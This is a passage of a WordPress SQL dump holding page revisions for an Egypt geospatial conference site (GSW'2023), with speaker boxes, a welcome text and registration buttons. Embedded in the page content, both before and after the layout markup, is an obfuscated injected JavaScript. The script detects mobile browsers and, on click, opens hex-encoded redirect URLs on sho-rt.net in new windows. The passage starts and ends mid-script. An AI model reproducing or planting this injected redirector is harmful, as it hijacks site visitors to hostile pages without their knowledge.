_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-06 20:14:05','2022-10-06 20:14:05','',2167,'https://gsw2023.com/?p=2327',0,'revision','',0),
(2328,1,'2022-10-06 20:16:35','2022-10-06 20:16:35','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665117715892{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665119554164{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #FFFFFF), color-stop(54%, #FFFFFF), color-stop(81%, #FFFFFF), color-stop(95%, #FFFFFF));background: -moz-linear-gradient(left,#FFFFFF 10%,#FFFFFF 54%,#FFFFFF 81%,#FFFFFF 95%);background: -webkit-linear-gradient(left,#FFFFFF 10%,#FFFFFF 54%,#FFFFFF 81%,#FFFFFF 95%);background: -o-linear-gradient(left,#FFFFFF 10%,#FFFFFF 54%,#FFFFFF 81%,#FFFFFF 95%);background: -ms-linear-gradient(left,#FFFFFF 10%,#FFFFFF 54%,#FFFFFF 81%,#FFFFFF 95%);background: linear-gradient(left,#FFFFFF 10%,#FFFFFF 54%,#FFFFFF 81%,#FFFFFF 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023 By\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" margin_design_tab_text=\"\"][/ultimate_heading][vc_masonry_media_grid element_width=\"6\" grid_id=\"vc_gid:1665119259246-2c5e5f13-c051-1\" include=\"2325,2326\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 